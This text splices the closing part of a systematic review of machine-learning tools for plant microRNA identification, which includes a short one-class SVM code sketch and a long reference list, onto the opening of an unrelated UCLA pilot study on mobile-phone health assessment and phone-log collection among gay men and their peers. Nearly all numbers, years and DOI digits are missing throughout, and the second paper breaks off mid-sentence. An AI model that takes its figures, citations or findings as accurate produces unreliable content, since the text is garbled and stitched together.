unlabeled examples may provide an added advantage.
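the one-class and pu-learning approaches touched on here and in the next paragraph sidestep the negative-data problem by training only on known (positive) examples. a minimal sketch of the one-class variant with scikit-learn's OneClassSVM is shown below; the feature vectors are synthetic and the nu/gamma settings are placeholders, not values from any of the reviewed studies.

```python
import numpy as np
from sklearn.svm import OneClassSVM
from sklearn.preprocessing import StandardScaler

rng = np.random.default_rng(1)

# positives only: feature vectors for known plant pre-miRNAs (synthetic stand-ins here)
X_pos = rng.normal(loc=0.0, scale=1.0, size=(200, 20))

scaler = StandardScaler().fit(X_pos)
clf = OneClassSVM(kernel="rbf", nu=0.05, gamma="scale").fit(scaler.transform(X_pos))

# unlabeled candidates, e.g. windows from a genome scan (also synthetic here)
X_new = rng.normal(loc=0.5, scale=1.2, size=(50, 20))
pred = clf.predict(scaler.transform(X_new))   # +1 = miRNA-like, -1 = outlier
print("candidates flagged as miRNA-like:", int((pred == 1).sum()), "of", len(pred))
```

a pu-learning variant would additionally exploit the unlabeled candidates during training rather than only at prediction time.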
due to the issues surrounding finding quality negative data, one-class classification or pu learning models (using positive and unlabeled samples) (wu et al., ) may also be a fruitful choice. conclusion in this work, we have conducted a systematic review of ab initio plant mirna identification tools that have been developed over the last decade. to achieve this, five questions were posed which aimed to elucidate the developments and assess the reliability and validity of the various methods used to identify novel plant mirnas. in total there are studies that addressed plant mirna identification using machine learning. although it is a relatively small number of studies, most of the studies report promising results in the range of % of accuracy or above obtained through computational validation. only % of the studies focused on only plants and even fewer of them focused manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. on a specific plant species. this demonstrates a pressing need for plant specific and species specific methods. compared with the dataset available for animal species, there is a relatively small number of experimentally verified plant mirnas. this limits the authors and developers of machine learning tools, which require sometimes copious amounts of data for the training of their models. recognizing the most informative features that are based on unique features of plant datasets will likely increase the accuracy of those methods. whilst many studies continued using features from previous studies resulting in a large set of features, it’s important to verify that the assumptions that were made when the data was created are still in line with the present understanding of mirna biology. while it is true that the models are performing well, they are being tested on low quality data. so, we do raise this as a major concern. it is a well-known problem that a considerable number of predicted mirnas are false predictions (taylor et al., ). so, cleaning up the current knowledge bases should be a top priority. otherwise, these errors will be propagated as well. an additional challenge is that not all the developed software are accessible by the public. some of them do not work as advertised due to technical issues and that further decreases the number of available methods with respect to plant mirna prediction. given that the intended audience of these tools would be biologists (i.e., non-experts in software development), extreme care must be taken in improving the availability, user friendliness and reliability. for the models involving different parameter options, guidelines must be provided in finding the optimum parameter values for the dataset of interest. acknowledgements the authors would like to gratefully acknowledge the assistance provided for reviewing the manuscript by dr. jennifer lachowiec, assistant professor at the department of plant sciences and plant pathology, montana state university. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • buwani manuweera performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. 
• gillian reynolds performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • indika kahanda conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: the raw data is available in the supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abe s. . overview of neural networks. in: neural networks and fuzzy systems. boston: springer us, – doi . / - - - - _ . abu-halaweh nm, harrison rw. . identifying essential features for the classifica- tion of real and pseudo micrornas precursors using fuzzy decision trees. in: ieee symposium on computational intelligence in bioinformatics and computational biology, cibcb . piscataway: ieee, – doi . /cibcb. . . ambros v, bartel b, bartel dp, burge cb, carrington jc, chen x, dreyfuss g, eddy sr, griffiths-jones s, marshall m, matzke m, ruvkun g, tuschl t. . a uniform system for microrna annotation. rna ( ): – doi . /rna. . an j, lai j, sajjanhar a, lehman ml, nelson cc. . mirplant: an integrated tool for identification of plant mirna from rna sequencing data. bmc bioinformatics : – doi . / - - - . axtell mj, meyers bc. . revisiting criteria for plant microrna annotation in the era of big data. the plant cell ( ): – doi . /tpc. . . axtell mj, westholm jo, lai ec. . vive la différence: biogenesis and evolution of micrornas in plants and animals. genome biology ( ): doi . /gb- - - - . breakfield nw, corcoran dl, petricka jj, shen j, sae-seaw j, rubio-somoza i, weigel d, ohler u, benfey pn. . high-resolution experimental and computational profiling of tissue-specific known and novel mirnas in arabidopsis. genome research ( ): – doi . /gr. . . breiman l. . random forests. machine learning ( ): – doi . /a: . challinor aj, watson j, lobell db, howden sm, smith dr, chhetri n. . a meta- analysis of crop yield under climate change and adaptation. nature climate change ( ): – doi . /nclimate . douglass s, hsu s-ww, cokus s, goldberg rb, harada jj, pellegrini m. . a naïve bayesian classifier for identifying plant micrornas. the plant journal: for cell and molecular biology ( ): – doi . /tpj. . evers m, huttner m, dueck a, meister g, engelmann jc. . mira: adaptable novel mirna identification in plants using small rna sequencing data. bmc bioinformatics ( ): – doi . /s - - - . manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /cibcb. . http://dx.doi.org/ . /rna. http://dx.doi.org/ . / - - - http://dx.doi.org/ . /tpc. . http://dx.doi.org/ . /gb- - - - http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /a: http://dx.doi.org/ . /nclimate http://dx.doi.org/ . /tpj. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. fine s, singer y, tishby n. . the hierarchical hidden markov model: analysis and applications. machine learning ( ): – doi . /a: . freund y, schapire re. . a short introduction to boosting. technical report . 
gao p, bai x, yang l, lv d, li y, cai h, ji w, guo d, zhu y. . over-expression of osa-mir c decreases salt and alkali stress tolerance. planta ( ): – doi . /s - - - . guan d-gg, liao j-yy, qu z-hh, zhang y, qu l-hh. . mirexplorer: detecting micrornas from genome and next generation sequencing data using the adaboost method with transition probability matrix and combined features. rna biology ( ): – doi . /rna. . . . guan q, lu x, zeng h, zhang y, zhu j. . heat stress induction of mir triggers a regulatory loop that is critical for thermotolerance in arabidopsis. the plant journal ( ): – doi . /tpj. . hackenberg m, rodriguez-ezpeleta n, aransay am. . miranalyzer: an update on the detection and analysis of micrornas in high-throughput sequencing experi- ments. nucleic acids research (suppl):w –w doi . /nar/gkr . hoegh guldberg o, jacob d, taylor m, bindi m, brown s, camilloni i, diedhiou a, djalante r, ebi k, engelbrecht f, guiot k, hijioka y, mehrotra s, payne a, seneviratne s, thomas a, warren r, zhou g, halim s, achlatis m, alexander l, allen m, berry p, boyer c, brilli l, buckeridge m, cheung w, craig m, ellis n, evans j, fisher h, fraedrich k, fuss s, ganase a, gattuso j, greve p, guillen t, hanasaki n, hasegawa t, hayes k, hirsch a, jones c, jung t, kanninen m, krinner g, lawrence d, lenton t, ley d, liveman d, mahowald n, mcinnes k, meissner k, millar r, mintenbeck k, mitchell d, mix a, notz d, nurse l, okem a, olsson l, oppenheimer m, paz s, peterson j, petzold j, preuschmann s, rahman m, rogelj j, scheuffele h, schleussner c-f, scott d, seferian r, sillmann j, singh c, slade r, stephenson k, stephenson t, sylla m, tebboth m, tschakert p, vautard r, wartenburger r, wehner m, weyer n, whyte f, yohe g, zhang x, zougmore r. . chapter : impacts of . ◦c global warming on natural and human systems. global warming of . ◦c. an ipcc special report on the impacts of global warming of . ◦c above pre-industrial levels and related global greenhouse gas emission pathways, in the context of strengthening the global response to the threat of climate change. intergovernmental panel on climate change. available at http://pure.iiasa.ac.at/id/eprint/ / . hu y, lan w, miller d. . next-generation sequencing for microrna expression profile. new york: humana press, – doi . / - - - - _ . kadri s, hinman v, benos pv. . hhmmir: efficient de novo prediction of mi- crornas using hierarchical hidden markov models. bmc bioinformatics (suppl. ): – doi . / - - -s -s . kecman v. . support vector machines—an introduction. springer, berlin, heidelberg, – doi . / _ . manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /a: http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /rna. . . http://dx.doi.org/ . /tpj. http://dx.doi.org/ . /nar/gkr http://pure.iiasa.ac.at/id/eprint/ / http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . / _ http://dx.doi.org/ . /peerj-cs. koh i, kim k-b. . mirhunter: a tool for predicting microrna precursors based on combined computational method. biochip journal ( ): – doi . /s - - - . kozomara a, birgaoanu m, griffiths-jones s. . mirbase: from microrna se- quences to function. nucleic acids research (d ):d –d doi . /nar/gky . kozomara a, griffiths-jones s. . mirbase: annotating high confidence micrornas using deep sequencing data. nucleic acids research (database issue): – doi . /nar/gkt . lecun y, bengio y, hinton g. . deep learning. nature ( ): – doi . /nature . 
li w-x, oono y, zhu j, he x-j, wu j-m, iida k, lu x-y, cui x, zhu j-k. . the arabidopsis nfya transcription factor is regulated transcriptionally and posttran- scriptionally to promote drought resistance. source: the plant cell ( ): – doi . /tpc. . . liberati a, altman dg, tetzlaff j, mulrow c, gøtzsche pc, ioannidis jpa, clarke m, devereaux pj, kleijnen j, moher d. . the prisma statement for re- porting systematic reviews and meta-analyses of studies that evaluate health care interventions: explanation and elaboration. plos medicine ( ):e doi . /journal.pmed. . liu b, asseng s, müller c, ewert f, elliott j, lobell d, martre p, ruane a, wallach d, jones j, rosenzweig c, aggarwal p, alderman p, anothai j, basso b, biernath c, cammarano d, challinor a, deryng d, sanctis g, doltra j, fereres e, folberth c, garcia-vila m, gayler s, hoogenboom g, hunt l, izaurralde r, jabloun m, jones c, kersebaum k, kimball b, koehler a-k, kumar s, nendel c, oleary g, olesen j, ottman m, palosuo t, prasad p, priesack e, pugh t, reynolds m, rezaei e, rötter r, schmid e, semenov m, shcherbak i, stehfest e, stöckle c, stratonovitch p, streck t, supit i, tao f, thorburn p, waha k, wall g, wang e, white j, wolf j, zhao z, zhu y. . similar estimates of temperature impacts on global wheat yield by three independent methods. nature climate change ( ): – doi . /nclimate . liu l, li y, li s, hu n, he y, pong r, lin d, lu l, law m. . comparison of next- generation sequencing systems. journal of biomedicine and biotechnology : – doi . / / . mall r, gupta a, sonkar g. . effect of climate change on agricultural crops. current developments in biotechnology and bioengineering epub ahead of print sep doi . /b - - - - . - . meng j, liu d, sun c, luan y. . prediction of plant pre-micrornas and their mi- crornas in genome-scale sequences using structure-sequence features and support vector machine. bmc bioinformatics ( ): doi . /s - - -x. meyers bc, axtell mj, bartel b, bartel dp, baulcombe d, bowman jl, cao x, carring- ton jc, chen x, green pj, griffiths-jones s, jacobsen se, mallory ac, martienssen ra, poethig rs, qi y, vaucheret h, voinnet o, watanabe y, weigel d, zhu j-k. manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /nar/gky http://dx.doi.org/ . /nar/gkt http://dx.doi.org/ . /nature http://dx.doi.org/ . /tpc. . http://dx.doi.org/ . /journal.pmed. http://dx.doi.org/ . /nclimate http://dx.doi.org/ . / / http://dx.doi.org/ . /b - - - - . - http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /peerj-cs. . criteria for annotation of plant micrornas. plant cell ( ): – doi . /tpc. . . moran y, agron m, praher d, technau u. . the evolutionary origin of plant and animal micrornas. nature ecology & evolution ( ): doi . /s - - . ray dk, mueller nd, west pc, foley ja. . yield trends are insufficient to double global crop production by . plos one ( ):e doi . /journal.pone. . rogers k, chen x. . biogenesis, turnover, and mode of action of plant micrornas. the plant cell ( ): – doi . /tpc. . . runkler ta. . classification. in: data analytics. wiesbaden: vieweg+teubner verlag, – doi . / - - - - _ . silla pr, de o camargo-brunetto ma, binneck e. . using a support vector machine to identify pre-mirnas in soybean (glycine max) introns. in: th international conference on intelligent systems design and applications. piscataway: ieee, – . available at http://ieeexplore.ieee.org/document/ / doi . /isda. . . sunkar r, li y-f, jagadeeswaran g. . 
functions of micrornas in plant stress re- sponses. trends in plant science ( ): – doi . /j.tplants. . . . sunkar r, zhou x, zheng y, zhang w, zhu j-kk. . identification of novel and candidate mirnas in rice by high throughput sequencing. bmc plant biology ( ): – doi . / - - - . swain ph, hauska h. . the decision tree classifier: design and potential. ieee transactions on geoscience electronics ( ): – doi . /tge. . . taylor rs, tarver je, foroozani a, donoghue pcj. . microrna annota- tion of plant genomes—do it right or not at all. bioessays ( ): doi . /bies. . taylor rs, tarver je, hiscock sj, donoghue pcj. . evolutionary history of plant micrornas. trends in plant science : – doi . /j.tplants. . . . trindade i, capitão c, dalmay t, fevereiro mp, santos dmd. . mir and mir are up-regulated in response to water deficit in medicago truncatula. planta ( ): – doi . /s - - - . tseng k-c, chiang-hsieh y-f, pai h, chow c-n, lee s-c, zheng h-q, kuo p-l, li g-z, hung y-c, lin n-s, chang w-c. . microrpm: a microrna prediction model based only on plant small rna sequencing data. bioinformatics ( ): – doi . /bioinformatics/btx . unamba cin, nag a, sharma rk. . next generation sequencing technologies: the doorway to the unexplored genomics of non-model plants. frontiers in plant science : doi . /fpls. . . van peer g, lefever s, anckaert j, beckers a, rihani a, van goethem a, vold- ers p-j, zeka f, ongenaert m, mestdagh p, vandesompele j. . mirbase tracker: keeping track of microrna annotation changes. database : bau doi . /database/bau . manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tpc. . http://dx.doi.org/ . /s - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /tpc. . http://dx.doi.org/ . / - - - - _ http://ieeexplore.ieee.org/document/ / http://dx.doi.org/ . /isda. . http://dx.doi.org/ . /j.tplants. . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /tge. . http://dx.doi.org/ . /bies. http://dx.doi.org/ . /j.tplants. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /bioinformatics/btx http://dx.doi.org/ . /fpls. . http://dx.doi.org/ . /database/bau http://dx.doi.org/ . /peerj-cs. vitsios dm, kentepozidou e, quintais l, benito-gutiérrez e, van dongen s, davis mp, enright aj. . mirnovo: genome-free prediction of micrornas from small rna sequencing data and single-cells using decision forests. nucleic acids research ( ):e doi . /nar/gkx . voinnet o. . origin, biogenesis, and activity of plant micrornas. cell ( ): – doi . /j.cell. . . . williams ph, eyles r, weiller g. . plant microrna prediction by supervised machine learning using c . decision trees. journal of nucleic acids : – doi . / / . wu j, pan s, zhu x, zhang c, wu x. . positive and unlabeled multi-graph learning. ieee transactions on cybernetics ( ): – doi . /tcyb. . . wu y, wei b, liu h, li t, rayner s. . mirpara: a svm-based software tool for prediction of most probable microrna coding regions in genome scale sequences. bmc bioinformatics ( ) doi . / - - - . xiao j, tang x, li y, fang z, ma d, he y, li m. . identification of microrna precursors based on random forest with network-level representation method of stem-loop structure. bmc bioinformatics ( ): doi . / - - - . xuan p, guo m, liu x, huang y, li w, huang y. . plantmirnapred: efficient clas- sification of real and pseudo plant pre-mirnas. bioinformatics ( ): – doi . /bioinformatics/btr . xue c, li f, he t, liu g-p, li y, zhang x. . 
classification of real and pseudo microrna precursors using local structure-sequence features and support vector machine. bmc bioinformatics ( ): doi . / - - - . yao y, ma c, deng h, liu q, zhang j, yi m. . plantmirp: an efficient com- putational program for the prediction of plant pre-mirna by incorporating knowledge-based energy features. molecular biosystems ( ): – doi . /c mb a. yousef m, allmer j, khalifa w. . sequence motif-based one-class classifiers can achieve comparable accuracy to two-class learners for plant microrna detection. journal of biomedical science and engineering ( ): – doi . /jbise. . . yousef m, allmer j, khalifa w, yousef m. . accurate plant microrna prediction can be achieved using sequence motif features. journal of intelligent learning systems and applications ( ): – doi . /jilsa. . . zhang x, zou z, gong p, zhang j, ziaf k, li h, xiao f, ye z. . over-expression of microrna confers enhanced drought tolerance to tomato. biotechnology letters ( ): – doi . /s - - - . zhang y, yun z, gong l, qu h, duan x, jiang y, zhu h. . comparison of mirna evolution and function in plants and animals. microrna ( ): – doi . / . zhao b, liang r, ge l, li w, xiao h, lin h, ruan k, jin y. . identification of drought-induced micrornas in rice. biochemical and biophysical research commu- nications ( ): – doi . /j.bbrc. . . . manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nar/gkx http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . / / http://dx.doi.org/ . /tcyb. . http://dx.doi.org/ . / - - - http://dx.doi.org/ . / - - - http://dx.doi.org/ . /bioinformatics/btr http://dx.doi.org/ . / - - - http://dx.doi.org/ . /c mb a http://dx.doi.org/ . /jbise. . http://dx.doi.org/ . /jilsa. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /j.bbrc. . . http://dx.doi.org/ . /peerj-cs. zhong y, xuan p, han k, zhang w, li j. . improved pre-mirna classification by reducing the effect of class imbalance. biomed research international : – doi . / / . zhou l, liu y, liu z, kong d, duan m, luo l. . genome-wide identification and analysis of drought-responsive micrornas in oryza sativa. source: journal of experimental botany ( ): – doi . /jxb/erq . zhu r, zhang z, li y, hu z, xin d, qi z, chen q. . discovering numerical differences between animal and plant micrornas. plos one ( ):e doi . /journal.pone. . zou q, mao y, hu l, wu y, ji z. . mirclassify: an advanced web server for mirna family classification and annotation. computers in biology and medicine ( ): – doi . /j.compbiomed. . . . manuweera et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / / http://dx.doi.org/ . /jxb/erq http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.compbiomed. . . http://dx.doi.org/ . /peerj-cs. ucla ucla previously published works title mobile phone assessment in egocentric networks: a pilot study on gay men and their peers. permalink https://escholarship.org/uc/item/ h k qv journal connections (toronto, ont.), ( - ) issn - author comulada, w scott publication date - - doi . / . . peer reviewed escholarship.org powered by the california digital library university of california https://escholarship.org/uc/item/ h k qv https://escholarship.org http://www.cdlib.org/ connections december | issue & | volume | insna.org mobile phone assessment in egocentric networks: a pilot study on gay men and their peers abstract mobile phone-based data collection encompasses the richness of social network research. 
both individual- level and network-level measures can be recorded. for example, health-related behaviors can be reported via mobile assessment. social interactions can be assessed by phone-log data. yet the potential of mobile phone data collection has largely been untapped. this is especially true of egocentric studies in public health settings where mobile phones can enhance both data collection and intervention delivery, e.g. mobile users can video chat with counselors. this is due in part to privacy issues and other barriers that are more difficult to address outside of academic settings where most mobile research to date has taken place. in this article, we aim to inform a broader discussion on mobile research. in particular, benefits and challenges to mobile phone-based data collection are highlighted through our mobile phone-based pilot study that was conducted on egocentric networks of gay men (n = total participants). hiv-transmission and general health behaviors were reported through a mobile phone-based daily assessment that was administered through study participants’ own mobile phones. phone log information was collected from gay men with android phones. benefits and challenges to mobile implementation are discussed, along with the application of multi-level models to the type of longitudinal egocentric data that we collected. keywords: gay men, hiv risk behaviors, mobile phone log, ecological momentary assessment, ohmage authors w. scott comulada, is an assistant professor-in-residence in the department of psychiatry and biobehavioral sciences at the university of california, los angeles, california. he is also a methods core scientist for the center for hiv identification, prevention, and treatment services (chipts; p mh ) acknowledgements this study was funded and supported by the national institute of mental health (k mh ; p mh ). mobile phone-based data collection was supported by ohmage and the following centers at the university of california, los angeles: the center for embedded networked sensing and mobilize labs. in particular, i would like to thank deborah estrin and nithya ramanathan for input on the development of the mobile assessment. please send all correspendence to w. scott comulada, ucla center for community health, wilshire blvd, suite , los angeles, ca , usa. wcomulada@mednet.ucla.edu. w. scott comulada university of california los angeles, california connections insna.org | volume | issue | december mobile phone assessment in egocentric networks . introduction mobile phones are by nature social devices as highlighted by numerous studies on the structure of mobile communication networks (e.g., onnela et al., ; ye et al., ) and individual tie strengths (zhang & dantu, ). most studies have analyzed sociometric data where large and bounded networks are observed. in contrast, egocentric networks of individuals, i.e. egos, and their peers, i.e. alters, have received less attention. in part, the focus on sociometric data may be due to the availability of “safe” data sets that are collected in laboratory settings, often on faculty and students where privacy issues are less critical and participants are technologically savvy. a good example is the mit reality mining data set (zhang & dantu, ). egocentric networks are often assessed in public health settings on marginalized populations, e.g. drug-using networks (yang, latkin, muth, & rudolph, ). privacy is critical and “tech-savvy” assumptions may be unrealistic. 
yet mobile assessment has been successfully carried out in cocaine-addicted homeless patients (freedman et al., ) and other marginalized populations. furthermore, mobile technologies can enhance data collection and intervention delivery in public health settings, e.g. ecological momentary interventions (heron & smyth, ). as we have found in our own transition from more traditional modes of data collection to mobile-based studies, an important part of the implementation process is a clear understanding of what mobile technologies can and cannot do. as noted by lazer et al. ( ), researchers and institutional review boards (irbs) alike need to be up to speed on the latest technologies in order to design and evaluate proper privacy and encryption protocols, respectively. in this article, we highlight the benefits and limitations of mobile data collection through egocentric data that was collected to test the implementation of a mobile phone-based health assessment in a sample of gay men, i.e. egos, and their peers, i.e. alters. both egos and alters used their own phones to fill out a health assessment and enter sensitive information on hiv-transmission behaviors. we collected phone-log data from a subset of the egos with android phones in order to compare mobile communications with alters in the study and with individuals who did not enroll in the study. therefore, our study provides a good opportunity to discuss privacy and ethical issues that are central to public health settings. we also give examples of research questions and analytic strategies that are afforded by the collection of mobile data in an egocentric study. a key feature of our data is the three levels of hierarchy. egocentric data normally contains two levels where individuals (both egos and alters) are nested within egocentric networks. multi- level models are applied and contain random effects for each network to allow mean levels of the outcome to differ across networks (e.g., hall, ; rice et al., ; snijders, spreen, & zwaagstra, ; valente, ). in our study, participants filled out an end-of-the-day mobile assessment over a month; repeated observations are nested within individuals. we discuss extensions to the basic multi-level model to analyze longitudinal egocentric data. it is important to note that longitudinal data in our study resulted from daily reporting which is a course version of ecological momentary assessment (ema) where events are recorded as they occur in situ. ema also involves a large number of repeated measurements and depends on careful timing, e.g. several times a day, to capture variations in behavior within days (see shiffman, stone, & hufford, , and stone and shiffman, , for overviews). in contrast, standard assessment methods rely on retrospective recall where study participants are asked to report on behaviors over a period of time and are often interviewed in a clinical setting. ema minimizes recall biases that are intensified as individuals reconstruct and retrieve events from their memory over longer periods of time. by self-administering assessments, ema may also reduce interview bias, e.g. in giving socially desirable responses to sexual behavior questions (kissinger et al., ). . data and methods . participants recruitment was conducted online (figure ). from april to august, , egos were recruited through pop- up messages on grindr, a dating website for gay men, and postings on craigslist that directed them to a study webpage. craigslist is an online forum for classified ads. 
the study webpage directed egos to online screening and consent forms that were hosted by surveymonkey (http://www.surveymonkey.com/). study eligibility required egos to ) self-identify as a gay or bisexual man; ) be at least years old; ) live in los angeles county; ) use a web-enabled android phone, version . or higher (issued after november ), or an iphone; ) use their mobile phone to participate in the study; and ) recruit at least alters who had an android or iphone they could use to participate in the study. out of egos who started the online forms, % were not eligible (n = ) and % did not finish filling out the forms (n = ). it is hard to know why connections december | issue | volume | insna.org mobile phone assessment in egocentric networks so many individuals did not finish filling out forms. in at least one instance, a peer started to fill out the forms on their mobile phone, lost internet connection, and did not attempt to re-initiate the forms. eligible egos ( %; n = of ) were e-mailed to set up a one-time telephone interview and also received instructions on how to install and use the study mobile apps; calls were scheduled with egos. during the call, we administered a demographic and social network assessment. grindr banner ads were the primary recruitment source (n = of telephone interviews). after the telephone interview, egos were sent an e-mail template they could send to alters they wished to invite into the study. the e-mail template contained a link that directed interested alters to a separate study webpage and in turn, online screener and consent forms. the online form asked alters to enter the first name and phone number of the ego who recruited them so we could construct ego-alter links. eligible alters fulfilling ), ), and ) were contacted and administered a demographic assessment. we relaxed the requirement for egos to recruit alters and allowed egos and alters to participate if at least alters per egocentric network were recruited. out of egos who completed a telephone interview, roughly in recruited at least alters and enrolled in the study (n = of ; figure ). we did not follow-up with unenrolled egos to find out the reason. one ego let us know that his friends did not want to join and “share private information”. out of alters who started the online screener, % (n= ) completed the screener and provided contact information to schedule an interview. thirty two of alters who were interviewed by telephone enrolled in the study. egos and alters were e-mailed amazon gift card activation codes worth $ and $ , respectively, at the end of the study as incentives. egos and alters who were the most compliant in filling out the daily health assessment were entered into a drawing to also receive an amazon gift card activation code worth $ . all study procedures were approved by the institutional review board at the university of california, los angeles. . data collection telephone interviews were conducted at the beginning of the study prior to the start of the mobile phone health assessment. egos were queried on where they heard about the study, the model of the mobile phone they would be using during the study, age, and ethnicity. alters were queried on their relationship to the ego who recruited them, gender, age, ethnicity, whether or not they lived in los angeles county, and their sexual orientation. during figure : recruitment and enrollment of egos (gay men) and alters and initiation of mobile phone-based data collection. 
connections insna.org | volume | issue | december mobile phone assessment in egocentric networks the telephone interview, egos were also administered a -item adapted version of the arizona social support inventory (barrera & gottlieb, ) to elicit names of people with whom the respondent socializes, lives, eats meals, has sex, does alcohol and drugs, receives health advice, calls upon for material and emotional support, or any other people who were important to them that had not been prompted by the prior name-generator questions. after the -item inventory, we asked for names of alters the ego was planning to ask to join them in the study. almost all of the egos who enrolled in the study recruited at least one alter who had not been prompted by the -item inventory (n = of ). we calculated the size of each egocentric network based on the number of names generated by the -item inventory. seven of the egos gave “other” responses that encompassed multiple people, e.g. “family”, and were excluded from the network-size calculation. phone logs were recorded through systemsens (http://systemsens.ohmage.org), an android application that was designed to collect passive system data and developed through the ucla center for embedded networked sensing. egos with android phones were asked to download systemsens to their mobile phone through an e-mail link. once installed, systemsens automatically encrypted and uploaded phone-log data (including phone numbers, the duration, and date / time stamp of incoming and outgoing calls and text messages) to servers at ucla whenever the user charged their phone. to protect the identity of phone numbers belonging to individuals who were not enrolled in the study, all phone numbers in the phone log were scrambled using sha- , a cryptographic hash function published by the national institute of standards and technology. there are several notable features of sha- . hashed numbers appear as unique -bit values, e.g. “b a bdd af d d d eb b a”. as a result, one is able to identify if two hashed numbers are of the same phone number. however, it is nearly impossible to recover the original phone number from a hashed number alone. the original phone number is necessary to act as a key that unscrambles the hashed number and verifies the original number. mobile phone assessment. all participants (both egos and alters) were asked to fill out the same daily assessment on their mobile phone for a month. assessments were launched using the ohmage application (http://www.ohmage.org), an open-source application that is compatible with android and iphones. ohmage allows for assessments to be rapidly authored using the extensible markup language (xml), and allows data to flow from participants’ mobile phones to a centralized database. in this study, ohmage was launched with an html application implemented using the mobile web framework (mwf). the application runs on both android and iphones and is available for download from the google play and apple app stores, respectively. a version of ohmage that is native to android phones has been implemented in prior studies (swendeman et al., ); feedback from focus groups on prior mobile studies informed the design of the mobile assessment (ramanathan et al., ). once installed, participants accessed the mobile asssessment through the ohmage dashboard shown in figure a. 
at the end of each assessment, responses were encrypted, uploaded to servers at ucla, and removed from the user’s mobile phone, as long as there was network connectivity and the phone battery was not low. responses could also be manually uploaded at a later time. mobile phone assessment consisted of questions that participants were asked to fill out at the end of the day for a month. questions encompassed the table : frequency of communication with alters based on ego reports (includes face-to-face, telephone, and social media contact) and based on the number of days between phone log calls/ text messages between egos and alters connections december | issue | volume | insna.org mobile phone assessment in egocentric networks following domains in the following order: (a) an adapted version of the healthy days symptoms module from the health-related quality of life instrument (hrqol; centers for disease control and prevention, ), including questions on mood, worry, sleep, energy level, and impairment; (b) daily minutes of exercise and type of exercise, e.g. “jogging”; (c) rating of one’s daily eating, e.g. “less healthy than usual”; (d) a food inventory that was constructed from multiple food inventories (e.g., fulkerson et al., ; kaiser et al., ; sisk, sharkey, mcintosh, & anding, ) and designed to fit across two cell phone screens; (e) sexual behavior, including the number of sexual encounters involving anal or vaginal sex, the number of encounters with “casual (including one-time and first-time) partners”, and condom usage; and (g) alcohol and substance use. all questions included a “refuse to answer” response option so that participants were not forced to answer any questions they did not want to. however, we did not want participants to repetitively select refusal responses in order to get through the daily assessment more quickly. we placed additional “speed bump” questions that required participants to specify why they refused to answer the prior question in two places. the first speed- bump question was placed after minutes of exercise were queried, and the second was placed after the number of sexual encounters was queried at approximately the halfway point and end of the assessment. no refusals were entered, except for the impairment question ( refusal) and substance use ( refusals). . analytic strategies and results . . sample characteristics among egos who were interviewed over the telephone (n = ), the average age was . years old (range = to ). ethnicity was reported as african american ( . %), latino ( . %), white ( . %), or other ( . %). egos reported a network size of . members, on average (range = to ). networks were fairly homogenous with respect to age and ethnicity. for example, most of the white egos (n = of ) only recruited white alters. half of the latino egos (n = of ) only recruited latino alters. . . call logs phone logs were recorded for four egos with android phones. logs began recording as soon as systemsens was installed and continued until the end of the study that included the -day health assessment time period (range = to days). one ego was only able to recruit one peer and dropped out of the study after days. similar to onnela et al. ( ), we excluded one-way communications where calls or text from an ego to a phone number occurred, or vice versa, but were not reciprocated. by focusing on reciprocated communications, we eliminated communications related to single events where egos did not personally know individuals they were communicating with. 
two phone log analyses are discussed. agreement between self-reported contact and phone logs. the frequency of contact with network members is typically self-reported by egos. given the additional contact information provided by mobile communication (both calls and text messages), a natural question arises. do phone logs provide overlapping information to self-reported contact or do phone logs provide additional information? table demonstrates a way to address this question by showing egos’ self- reported frequency of contact with alters that was reported during the telephone interview and the median number of days between mobile communications with alters. phone logs corroborate the self-reported frequencies fairly well. for example, four of five “daily” reports matched up with call logs where half of the communications occurred within a day of each other. alter closeness. there is a general understanding in social network research that observed networks in a study are incomplete. social ties with individuals outside figure : ohmage mwf screenshots showing (a) dashboard for accessing daily health survey and sample questions from the daily health survey, including a (b) multiple-response item and (c) an item requiring numeric entry. connections insna.org | volume | issue | december mobile phone assessment in egocentric networks the study network can sometimes be constructed by self-report (e.g., fowler & christakis, ), though this is typically not the case. therefore, phone log communication data can fill in gaps on self-reported network compositions. in particular, we focus on the frequency of egos’ mobile communications with recruited alters and individuals outside the study as a proxy for ego-alter closeness. information on closeness with alters who are likely to be recruited into a study has the potential to inform the design of both social network- based interventions (see valente, for a review) and recruitment strategies (e.g., respondent-driven sampling; heckathorn, , ). figure shows the percentage of communications with each alter and with the remaining telephone numbers in the phone logs. among these four egos, we note that they recruited at least one alter they were in fairly frequent contact with, e.g. 